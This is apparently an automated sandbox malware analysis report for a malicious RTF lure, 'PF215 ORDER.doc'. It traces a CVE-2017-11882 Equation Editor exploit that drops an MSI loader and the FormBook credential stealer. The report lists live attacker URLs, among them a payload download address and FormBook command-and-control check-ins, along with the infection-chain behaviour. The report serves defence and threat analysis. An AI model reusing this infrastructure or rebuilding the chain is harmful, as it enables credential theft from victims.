File name:

PF215 ORDER.doc

Full analysis: https://app.any.run/tasks/246a99a6-ad60-40cb-bc0c-95fe3549864b
Verdict: Malicious activity
Threats:

FormBook is a data stealer that is being distributed as a MaaS. FormBook differs from a lot of competing malware by its extreme ease of use that allows even the unexperienced threat actors to use FormBook virus.

Malware Trends Tracker     >>>
Analysis date: June 26, 2019, 11:53:35
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
ole-embedded
exploit
cve-2017-11882
opendir
exe-to-msi
loader
trojan
formbook
stealer
Indicators:
MIME: text/rtf
File info: Rich Text Format data, version 1, unknown character set
MD5:

2FFE1A318736D58FEDF4C4D37D9A11D3

SHA1:

8EAAE0CC3B061A8F19C77FBBE4253020CC54CB6A

SHA256:

36B6A50CEC1BC87D95E4A81EDF1F8CB601A97B1D52D820806589C69676021591

SSDEEP:

192:pxx4JgBwixtJQ5J6FWdkzqMpH/M5y1XL6qB9MK9a6RDjKi/bEPkod8sjG5LX+ppj:So0D9+cP

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Uses Microsoft Installer as loader

      • cmd.exe (PID: 3464)
      • cmd.exe (PID: 3344)

    • Application was dropped or rewritten from another process

      • obj2Bilmaven8.exe (PID: 2332)
      • obj2Bilmaven8.exe (PID: 3440)
      • obj2Bilmaven8.exe (PID: 2356)
      • obj2Bilmaven8.exe (PID: 456)
      • obj2Bilmaven8.exe (PID: 3912)
      • obj2Bilmaven8.exe (PID: 3604)
      • EQNEDT32.EXE (PID: 3320)
      • EQNEDT32.EXE (PID: 2804)
      • EQNEDT32.EXE (PID: 2792)
      • msohtmed.exe (PID: 2288)
      • EQNEDT32.EXE (PID: 4000)
      • Cookiesjfitqtfp.exe (PID: 1508)
      • obj2Bilmaven8.exe (PID: 2340)
      • obj2Bilmaven8.exe (PID: 2812)
      • Cookiesjfitqtfp.exe (PID: 988)
      • obj2Bilmaven8.exe (PID: 3180)

    • Changes the autorun value in the registry

      • obj2Bilmaven8.exe (PID: 2332)
      • obj2Bilmaven8.exe (PID: 456)
      • taskhost.exe (PID: 3064)
      • obj2Bilmaven8.exe (PID: 3180)

    • Downloads executable files from the Internet

      • msiexec.exe (PID: 3552)

    • Equation Editor starts application (CVE-2017-11882)

      • EQNEDT32.EXE (PID: 2792)
      • EQNEDT32.EXE (PID: 2804)

    • Loads dropped or rewritten executable

      • Setup.exe (PID: 2604)
      • WerFault.exe (PID: 3188)
      • WerFault.exe (PID: 3584)
      • EQNEDT32.EXE (PID: 3320)
      • EQNEDT32.EXE (PID: 2804)
      • EQNEDT32.EXE (PID: 2792)
      • WINWORD.EXE (PID: 2936)
      • explorer.exe (PID: 252)
      • svchost.exe (PID: 848)
      • EQNEDT32.EXE (PID: 4000)
      • opera.exe (PID: 2968)

    • Connects to CnC server

      • explorer.exe (PID: 252)

    • FORMBOOK was detected

      • explorer.exe (PID: 252)

    • Formbook was detected

      • taskhost.exe (PID: 3064)
      • Firefox.exe (PID: 3480)

    • Actions looks like stealing of personal data

      • taskhost.exe (PID: 3064)

    • Stealing of credential data

      • taskhost.exe (PID: 3064)

  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • EQNEDT32.EXE (PID: 2804)
      • taskhost.exe (PID: 3064)
      • EQNEDT32.EXE (PID: 2792)

    • Executed via COM

      • EQNEDT32.EXE (PID: 2804)
      • EQNEDT32.EXE (PID: 2792)
      • Setup.exe (PID: 2604)
      • EQNEDT32.EXE (PID: 3320)
      • DllHost.exe (PID: 2840)
      • EQNEDT32.EXE (PID: 4000)

    • Drop ExeToMSI Application

      • msiexec.exe (PID: 3552)

    • Application launched itself

      • obj2Bilmaven8.exe (PID: 2332)
      • obj2Bilmaven8.exe (PID: 3440)
      • obj2Bilmaven8.exe (PID: 456)
      • obj2Bilmaven8.exe (PID: 3912)
      • Cookiesjfitqtfp.exe (PID: 1508)
      • obj2Bilmaven8.exe (PID: 3180)
      • obj2Bilmaven8.exe (PID: 2340)

    • Executable content was dropped or overwritten

      • MSI13D3.tmp (PID: 3828)
      • MSI9452.tmp (PID: 4056)
      • Setup.exe (PID: 2604)
      • MsiExec.exe (PID: 2824)
      • MsiExec.exe (PID: 3304)
      • MsiExec.exe (PID: 3256)
      • MsiExec.exe (PID: 3472)
      • MsiExec.exe (PID: 2540)
      • MsiExec.exe (PID: 3932)
      • MsiExec.exe (PID: 1816)
      • MsiExec.exe (PID: 3024)
      • MsiExec.exe (PID: 720)
      • msiexec.exe (PID: 3552)
      • explorer.exe (PID: 252)
      • DllHost.exe (PID: 2840)
      • MsiExec.exe (PID: 2260)

    • Searches for installed software

      • Setup.exe (PID: 2604)

    • Creates files in the Windows directory

      • msiexec.exe (PID: 3552)

    • Creates files in the user directory

      • taskhost.exe (PID: 3064)

    • Loads DLL from Mozilla Firefox

      • taskhost.exe (PID: 3064)

    • Disables SEHOP

      • msiexec.exe (PID: 3552)

    • Removes files from Windows directory

      • msiexec.exe (PID: 3552)

    • Creates COM task schedule object

      • msohtmed.exe (PID: 2288)
      • msiexec.exe (PID: 3552)

    • Starts Microsoft Office Application

      • msiexec.exe (PID: 3552)

    • Creates files in the program directory

      • DllHost.exe (PID: 2840)

    • Modifies the open verb of a shell class

      • msiexec.exe (PID: 3552)

    • Starts itself from another location

      • Cookiesjfitqtfp.exe (PID: 988)

  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2936)
      • Setup.exe (PID: 2604)
      • MsiExec.exe (PID: 720)
      • msohtmed.exe (PID: 2288)

    • Starts Microsoft Office Application

      • explorer.exe (PID: 252)

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2936)
      • Firefox.exe (PID: 3480)
      • opera.exe (PID: 2968)

    • Writes to a desktop.ini file (may be used to cloak folders)

      • msiexec.exe (PID: 3552)

    • Starts application with an unusual extension

      • msiexec.exe (PID: 3552)
      • MSI13D3.tmp (PID: 2856)
      • MSI9452.tmp (PID: 3548)

    • Application was dropped or rewritten from another process

      • MSI13D3.tmp (PID: 2856)
      • MSI13D3.tmp (PID: 3828)
      • MSI9452.tmp (PID: 3548)
      • MSI9452.tmp (PID: 4056)
      • MSIEAAA.tmp (PID: 868)

    • Application launched itself

      • MSI13D3.tmp (PID: 2856)
      • MSI9452.tmp (PID: 3548)
      • msiexec.exe (PID: 3552)

    • Manual execution by user

      • taskhost.exe (PID: 3064)
      • wuapp.exe (PID: 3208)

    • Application was crashed

      • EQNEDT32.EXE (PID: 2792)
      • EQNEDT32.EXE (PID: 2804)

    • Loads dropped or rewritten executable

      • MsiExec.exe (PID: 2824)
      • msiexec.exe (PID: 3552)
      • MsiExec.exe (PID: 2456)
      • MsiExec.exe (PID: 3304)
      • MsiExec.exe (PID: 3500)
      • MsiExec.exe (PID: 2088)
      • MsiExec.exe (PID: 3256)
      • MsiExec.exe (PID: 3472)
      • MsiExec.exe (PID: 3348)
      • MsiExec.exe (PID: 3524)
      • MsiExec.exe (PID: 2328)
      • MsiExec.exe (PID: 3444)
      • MsiExec.exe (PID: 3816)
      • MsiExec.exe (PID: 2148)
      • MsiExec.exe (PID: 2540)
      • MsiExec.exe (PID: 2480)
      • MsiExec.exe (PID: 3932)
      • MsiExec.exe (PID: 1688)
      • MsiExec.exe (PID: 2516)
      • MsiExec.exe (PID: 1816)
      • MsiExec.exe (PID: 3156)
      • MsiExec.exe (PID: 3024)
      • MsiExec.exe (PID: 3960)
      • MsiExec.exe (PID: 720)
      • MsiExec.exe (PID: 2416)
      • MSIEAAA.tmp (PID: 868)
      • MsiExec.exe (PID: 2260)
      • MsiExec.exe (PID: 1668)

    • Creates files in the program directory

      • MsiExec.exe (PID: 2456)
      • MsiExec.exe (PID: 3500)
      • msiexec.exe (PID: 3552)
      • MsiExec.exe (PID: 3524)
      • MsiExec.exe (PID: 3348)
      • MsiExec.exe (PID: 2480)
      • MsiExec.exe (PID: 2516)
      • MsiExec.exe (PID: 3156)
      • MsiExec.exe (PID: 3960)
      • MsiExec.exe (PID: 2416)
      • MsiExec.exe (PID: 1668)

    • Dropped object may contain Bitcoin addresses

      • msiexec.exe (PID: 3552)

    • Creates a software uninstall entry

      • msiexec.exe (PID: 3552)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rtf | Rich Text Format (100)
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
106
Monitored processes
67
Malicious processes
15
Suspicious processes
6

Behavior graph

Click at the process to see the details
start drop and start drop and start drop and start drop and start drop and start winword.exe no specs eqnedt32.exe cmd.exe no specs msiexec.exe no specs msiexec.exe eqnedt32.exe no specs msi13d3.tmp no specs msi13d3.tmp obj2bilmaven8.exe obj2bilmaven8.exe no specs obj2bilmaven8.exe no specs #FORMBOOK taskhost.exe cmd.exe no specs eqnedt32.exe cmd.exe no specs msiexec.exe no specs msi9452.tmp no specs msi9452.tmp obj2bilmaven8.exe obj2bilmaven8.exe no specs setup.exe obj2bilmaven8.exe no specs wuapp.exe no specs msiexec.exe msiexec.exe no specs werfault.exe no specs werfault.exe no specs msiexec.exe no specs msiexec.exe msiexec.exe no specs msiexec.exe msiexec.exe no specs msiexec.exe #FORMBOOK explorer.exe msiexec.exe no specs msiexec.exe no specs msiexec.exe no specs msiexec.exe no specs msiexec.exe no specs msiexec.exe #FORMBOOK firefox.exe no specs msiexec.exe no specs msiexec.exe msiexec.exe no specs msiexec.exe no specs msiexec.exe msiexec.exe no specs msiexec.exe msiexec.exe no specs msiexec.exe msiexec.exe no specs msohtmed.exe no specs svchost.exe msieaaa.tmp no specs addinutil.exe addinutil.exe no specs opera.exe msiexec.exe msiexec.exe no specs eqnedt32.exe no specs Copy/Move/Rename/Delete/Link Object cookiesjfitqtfp.exe no specs cookiesjfitqtfp.exe no specs obj2bilmaven8.exe obj2bilmaven8.exe no specs obj2bilmaven8.exe no specs mstsc.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
252C:\Windows\Explorer.EXEC:\Windows\explorer.exe
ctfmon.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Explorer
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\winanr.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\explorer.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
456"C:\Users\admin\AppData\Local\Temp\obj2Bilmaven8.exe" C:\Users\admin\AppData\Local\Temp\obj2Bilmaven8.exe
MSI9452.tmp
User:
admin
Company:
PIOnEEr
Integrity Level:
MEDIUM
Exit code:
0
Version:
1.00
Modules
Images
c:\users\admin\appdata\local\temp\obj2bilmaven8.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvbvm60.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
720C:\Windows\system32\MsiExec.exe -Embedding A4289970CB0CC3407FC746177CC8D6F2C:\Windows\system32\MsiExec.exe
msiexec.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Exit code:
0
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\msiexec.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
848C:\Windows\system32\svchost.exe -k netsvcsC:\Windows\System32\svchost.exe
services.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windanr.exe
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
868"C:\Windows\Installer\MSIEAAA.tmp" ms-help://HxC:\Windows\Installer\MSIEAAA.tmpmsiexec.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Modules
Images
c:\windows\installer\msieaaa.tmp
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ole32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
988"C:\Program Files\G8pk\Cookiesjfitqtfp.exe"C:\Program Files\G8pk\Cookiesjfitqtfp.exeCookiesjfitqtfp.exe
User:
admin
Company:
PIOnEEr
Integrity Level:
MEDIUM
Exit code:
0
Version:
1.00
Modules
Images
c:\program files\g8pk\cookiesjfitqtfp.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvbvm60.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
1340"C:\Windows\Microsoft.NET\Framework\v3.5\addinutil.exe" -PipelineRoot:"C:\Program Files\Common Files\Microsoft Shared\VSTA\Pipeline.v10.0\." -RebuildC:\Windows\Microsoft.NET\Framework\v3.5\addinutil.exe
MsiExec.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
AddInUtil.exe
Exit code:
0
Version:
3.5.30729.5420 built by: Win7SP1
Modules
Images
c:\windows\microsoft.net\framework\v3.5\addinutil.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
1508"C:\Program Files\G8pk\Cookiesjfitqtfp.exe"C:\Program Files\G8pk\Cookiesjfitqtfp.exeexplorer.exe
User:
admin
Company:
PIOnEEr
Integrity Level:
MEDIUM
Exit code:
0
Version:
1.00
Modules
Images
c:\program files\g8pk\cookiesjfitqtfp.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvbvm60.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
1668C:\Windows\system32\MsiExec.exe -Embedding 238F59E626D63714DB2C260DCEF78DE6 M Global\MSI0000C:\Windows\system32\MsiExec.exemsiexec.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows® installer
Exit code:
0
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\msiexec.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
1688C:\Windows\system32\MsiExec.exe -Embedding 00AC4291C6AA2E02BEBCB6FD12234BBBC:\Windows\system32\MsiExec.exemsiexec.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Exit code:
0
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\msiexec.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
Total events
24 187
Read events
12 672
Write events
10 693
Delete events
822

Modification events

(PID) Process:(2936) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:*d
Value:
2A642000780B0000010000000000000000000000
(PID) Process:(2936) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
Off
(PID) Process:(2936) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
On
(PID) Process:(2936) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:WORDFiles
Value:
1322909726
(PID) Process:(2936) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
1322909848
(PID) Process:(2936) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
1322909849
(PID) Process:(2936) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
Operation:writeName:MTTT
Value:
780B000040B23FD3152CD50100000000
(PID) Process:(2936) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:$e
Value:
24652000780B000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:(2936) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:delete valueName:$e
Value:
24652000780B000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:(2936) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
Executable files
397
Suspicious files
144
Text files
94
Unknown types
145

Dropped files

PID
Process
Filename
Type
2936WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRE88A.tmp.cvr
MD5:
SHA256:
3188WerFault.exeC:\Users\admin\AppData\Local\Temp\WERF136.tmp.hdmp
MD5:
SHA256:
3188WerFault.exeC:\Users\admin\AppData\Local\Temp\WERF1D4.tmp.mdmp
MD5:
SHA256:
3188WerFault.exeC:\Users\admin\AppData\Local\Temp\WERF0C7.tmp.appcompat.txtxml
MD5:A7C42BA6416A96B9C45530F199833D9E
SHA256:48ECE97C88734E9D7BF84CDBDEE5A8C2EF98AA2A77DEDC6D4B057227E3A13DC6
3188WerFault.exeC:\Users\admin\AppData\Local\Microsoft\Windows\WER\ReportQueue\AppCrash_EQNEDT32.EXE_e4aa521f92615d8f32933274bec345ab359a4aca_cab_0c60f24e\WERF136.tmp.hdmpdmp
MD5:12C1D0E49604611BF75B79FE333FF133
SHA256:FC0E5247DEC68E4FC3262169C39301C79224F930D93BF2A13B345911D9B40279
3552msiexec.exeC:\Users\admin\AppData\Local\Temp\~DF5A1114757101AFFA.TMP
MD5:
SHA256:
848svchost.exeC:\Windows\appcompat\programs\RecentFileCache.bcftxt
MD5:71CA7046B0B8C29B86E377E31888B3D7
SHA256:1EF7983D907EA8D5C152B0A6352827CA3F4133C26E42A77E66AF092D86073AD0
3552msiexec.exeC:\Windows\Installer\MSI1045.tmpexecutable
MD5:ED24583EBBD6CF680E5A425C220412F2
SHA256:5A9D3EE3E3703ECBBDA8B47A17710DB9E3B1F4233971C4C4FF2D4BDC872F4553
3188WerFault.exeC:\Users\admin\AppData\Local\Microsoft\Windows\WER\ReportQueue\AppCrash_EQNEDT32.EXE_e4aa521f92615d8f32933274bec345ab359a4aca_cab_0c60f24e\Report.werbinary
MD5:EF4B25439F4075F63A4E88A33D00B724
SHA256:E3499186F3615EF3797589518A0D206080CF64E04C3927E0A279FDD8A065D8B5
3188WerFault.exeC:\Users\admin\AppData\Local\Microsoft\Windows\WER\ReportQueue\AppCrash_EQNEDT32.EXE_e4aa521f92615d8f32933274bec345ab359a4aca_cab_0c60f24e\WERF126.tmp.WERInternalMetadata.xmlxml
MD5:6007F4DC7EE843C5D1123DEC32A04AEA
SHA256:501086D16016CF02AB9D9CD543E5B17413177C6350B090D68C3706BF830198D1
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
29
TCP/UDP connections
34
DNS requests
23
Threats
72

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
252
explorer.exe
GET
198.54.117.210:80
http://www.udon-thani-directory.com/ha/?KtcDut2=gduUikMpfIdJA0K+t9sDgNZH29EIimTd+kz/tBt8FBKkvjIjEAEHf9dpC/JR7REA7RgVWg==&mz7xU=zZOP1n18Ez
US
malicious
252
explorer.exe
POST
198.54.117.210:80
http://www.udon-thani-directory.com/ha/
US
malicious
252
explorer.exe
POST
89.46.108.64:80
http://www.foodstocktruck.com/ha/
IT
malicious
252
explorer.exe
POST
198.54.117.210:80
http://www.udon-thani-directory.com/ha/
US
malicious
3552
msiexec.exe
GET
200
216.170.126.152:80
http://joeing.duckdns.org/joe/onye.msi
US
executable
396 Kb
malicious
252
explorer.exe
GET
184.168.221.52:80
http://www.asantebeauty.com/ha/?KtcDut2=PF+28T9j506vqTI3xo0lj/6LId/3TfkZWS0BCNFgaCrap2njAKXPLVkMpXo73JkhPknEjA==&mz7xU=zZOP1n18Ez
US
malicious
3552
msiexec.exe
GET
200
216.170.126.152:80
http://joeing.duckdns.org/joe/onye.msi
US
executable
396 Kb
malicious
252
explorer.exe
GET
404
192.64.115.176:80
http://www.skylod.com/ha/?KtcDut2=HSqaNnDc5SbFjjE4N24CnCxc2wWaP5zr+fN3XxC/DebGQe9AJdDbhQUfT2SIl/dq+3NihA==&mz7xU=zZOP1n18Ez
US
html
326 b
malicious
252
explorer.exe
POST
404
192.64.115.176:80
http://www.skylod.com/ha/
US
html
290 b
malicious
252
explorer.exe
POST
192.64.115.176:80
http://www.skylod.com/ha/
US
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3552
msiexec.exe
216.170.126.152:80
joeing.duckdns.org
ColoCrossing
US
malicious
252
explorer.exe
192.64.115.176:80
www.skylod.com
Namecheap, Inc.
US
malicious
252
explorer.exe
184.168.221.52:80
www.asantebeauty.com
GoDaddy.com, LLC
US
malicious
2968
opera.exe
185.26.182.93:443
certs.opera.com
Opera Software AS
whitelisted
252
explorer.exe
213.186.33.5:80
www.gallitrip.com
OVH SAS
FR
malicious
2968
opera.exe
93.184.220.29:80
crl4.digicert.com
MCI Communications Services, Inc. d/b/a Verizon Business
US
whitelisted
252
explorer.exe
89.46.108.64:80
www.foodstocktruck.com
Aruba S.p.A.
IT
malicious
252
explorer.exe
198.54.117.210:80
www.udon-thani-directory.com
Namecheap, Inc.
US
malicious
252
explorer.exe
64.98.145.30:80
www.chrisminney.com
Tucows.com Co.
CA
malicious
252
explorer.exe
69.172.201.153:80
www.actorlabs.com
Dosarrest Internet Security LTD
US
malicious

DNS requests

Domain
IP
Reputation
joeing.duckdns.org
  • 216.170.126.152
malicious
www.63qijian.com
unknown
www.asantebeauty.com
  • 184.168.221.52
malicious
www.skylod.com
  • 192.64.115.176
malicious
www.gallitrip.com
  • 213.186.33.5
malicious
www.andurilhuangblog.com
unknown
certs.opera.com
  • 185.26.182.93
  • 185.26.182.94
whitelisted
crl4.digicert.com
  • 93.184.220.29
whitelisted
www.foodstocktruck.com
  • 89.46.108.64
malicious
www.newhopefreshstart.com
unknown

Threats

PID
Process
Class
Message
1048
svchost.exe
Misc activity
ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
3552
msiexec.exe
Potential Corporate Privacy Violation
SUSPICIOUS [PTsecurity] Executable application_x-msi Download
3552
msiexec.exe
Potential Corporate Privacy Violation
POLICY [PTsecurity] Executable application_x-msi Download
3552
msiexec.exe
Misc activity
SUSPICIOUS [PTsecurity] Executable ExeToMSI Download
3552
msiexec.exe
Potential Corporate Privacy Violation
SUSPICIOUS [PTsecurity] Executable application_x-msi Download
3552
msiexec.exe
Potential Corporate Privacy Violation
POLICY [PTsecurity] Executable application_x-msi Download
3552
msiexec.exe
Misc activity
SUSPICIOUS [PTsecurity] Executable ExeToMSI Download
252
explorer.exe
A Network Trojan was detected
MALWARE [PTsecurity] FormBook CnC Checkin (GET)
252
explorer.exe
A Network Trojan was detected
MALWARE [PTsecurity] FormBook CnC Checkin (GET)
252
explorer.exe
A Network Trojan was detected
MALWARE [PTsecurity] TrojanSpy:FormBook CnC Checkin (POST)
23 ETPRO signatures available at the full report
Process
Message
msiexec.exe
Failed to release Service
addinutil.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
addinutil.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
addinutil.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
addinutil.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
addinutil.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
addinutil.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
addinutil.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
addinutil.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
addinutil.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
PF215 ORDER.doc